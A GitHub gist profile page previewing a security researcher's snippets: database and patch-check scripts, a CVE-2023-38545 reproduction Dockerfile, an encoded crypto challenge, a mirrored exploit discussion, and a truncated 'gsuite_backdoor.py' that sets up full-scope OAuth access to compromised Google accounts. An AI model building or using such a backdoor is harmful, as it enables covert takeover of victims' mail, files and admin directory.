Skip to content

Instantly share code, notes, and snippets.

View Oneiroi's full-sized avatar
:shipit:

David Busby Oneiroi

:shipit:
View GitHub Profile
@Oneiroi
Oneiroi / Dockerfile
Created October 11, 2023 10:30 — forked from xen0bit/Dockerfile
CVE-2023-38545
FROM debian:latest
RUN apt-get update && apt-get install -y \
git \
build-essential \
wget \
python3
WORKDIR /build
#!/bin/bash
# "---------------------------------------------------"
# " This is a simple script for creating a query "
# " that collects data from the table pg_class "
# " for list of databases "
# "---------------------------------------------------"
if [ "$#" -eq 0 ] ;
then
echo -e "\n\tYou must enter at least one database name as an argument."
@Oneiroi
Oneiroi / CVE-2020-0601-check.ps1
Created January 23, 2020 13:11
Powershell script to check if the target system has applied any of the KB articles which are thought to contain the fix for CVE-2020-0601
wmic qfe get Caption,Description,HotFixID,InstalledOn |Select-String 'KB45((3(4306|4271|4276|4293|4273))|28760|35550)'
@Oneiroi
Oneiroi / rand_pass.py
Last active August 23, 2018 16:16 — forked from bergantine/gist:1119284
Python Random Password Generator (One Liner). #python #password
python -c "from string import printable; from random import choice; print ''.join([choice(printable) for i in range(32)])"
@Oneiroi
Oneiroi / Unsolved crypto challenge since 2015-11-26
Last active December 4, 2017 10:29
This crypto challenege of my own devising has gone unsolved since I created it on 2015-11-26, can you recover the flag ?
596f7527766520676f7420736f6d6520776f726b206168656164206f6620796f753a20546d56346443427a644756774f6941304d545a6a4e6d51325a6a637a4e7a51794d4463304e6a67324e5463794e6a557a595449774e4745304e6a55304e444d304d544d324e474d314d44526d4e5455314d5451334e4463314f54526a4e4759304e5451794e5745304e7a52694e546b30597a51314e4455304d6a4d794e4463314d544d794e474d314e4451324e5445314d5451314e544d304f5451304e5467305a5451324e5463304e7a55354e446b304e44517a4e4759314e6a4d304e544d304d544d324e474d314d44526d4e5455314d5451334e444d304f5451304e5445305a5451324e5467304f4451354e446b304e4455794e4759314e6a55344e5467304f5456684e4745304d54526b4e4755314f4455334e446b31595452684d7a49304e5451784e5745304e4451784e475130595455324e4463304e5455354e5451304e54526c4e5449305a5452684e4449304d5455324e4463314d7a51794e475530596a4d314e4749304e54526b4d32517a5a444e6b
@Oneiroi
Oneiroi / gsuite_backdoor.py
Created November 2, 2017 13:45 — forked from ustayready/gsuite_backdoor.py
Quickly create a full-access backdoor on Google accounts by creating a Google API project at https://cloud.google.com/console, save the client_secrets.json into the same folder and then run the script below. It will print a URL for you to access with a browser that has the compromised Google account session active so you can authorize the applic…
#!/usr/bin/env python
import os
from oauth2client import client, tools
from oauth2client.file import Storage
SCOPES = 'https://www.googleapis.com/auth/calendar https://mail.google.com/ https://www.googleapis.com/auth/drive https://www.googleapis.com/auth/groups https://www.googleapis.com/auth/admin.directory.user'
def get_credentials():
credential_dir =os.getcwd()
client_secret_path = os.path.join(credential_dir, 'client_secrets.json')
@Oneiroi
Oneiroi / 44con_talks_watch.sh
Last active August 9, 2018 09:12
44con talks page watch
#!/bin/bash
OS=`uname`
URL44CON="https://44con.com/44con/44con-2018/44con-2018-schedule/"
#SET this to rickroll or w/e just make sure your speakers are on full volume
YTALERT="https://www.youtube.com/watch?v=H91rPIq2mN4"
if [ "Darwin" == "${OS}" ]; then
BROWSER="open";
elif [ "Linux" == "${OS}" ]; then
Mirror of https://zerobin.net/?06dae5d45335d2b4#m8FRD5qfMgH1rxjVH4oAjHvOMxJArCGp9UIogpmsnHg= (Since remove)
Pulled from https://archive.fo/5Vbc9
Reddit thread https://www.reddit.com/r/netsec/comments/5mw510/discussion_of_a_new_potential_exploit_for_openssl/
Original text now follows:
I'm glad more people are in here now. It gets much, much worse than this.
The post below literally says "if you have the password, you can generate the key and open the file.
while true; do curl -H'User-agent: AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.125 Safari/537.36' -s 'http://www.game.co.uk/webapp/wcs/stores/servlet/HubArticleView?hubId=639265&articleId=639266&catalogId=10201&langId=44&storeId=10151&&cm_mmc=Facebook-_-Digital-_-Fallout4-_-Link#NaN' | grep 'Check back later today' || chromium https://www.youtube.com/watch?v=H91rPIq2mN4; sleep 10; done
#
# ensure CWD contains dirs root and boot
# ensure sd card has not automounted elsewhere
# ensure ArchARM-rpi2.tgz exists in CWD
# ensure partitions configured as per: http://archlinuxarm.org/platforms/armv7/broadcom/raspberry-pi-2
#
mkfs.vfat /dev/mmcblk0p1 && \
mount /dev/mmcblk0p1 ./boot && \
mkfs.ext4 /dev/mmcblk0p2 && \
mount /dev/mmcblk0p2 ./root && \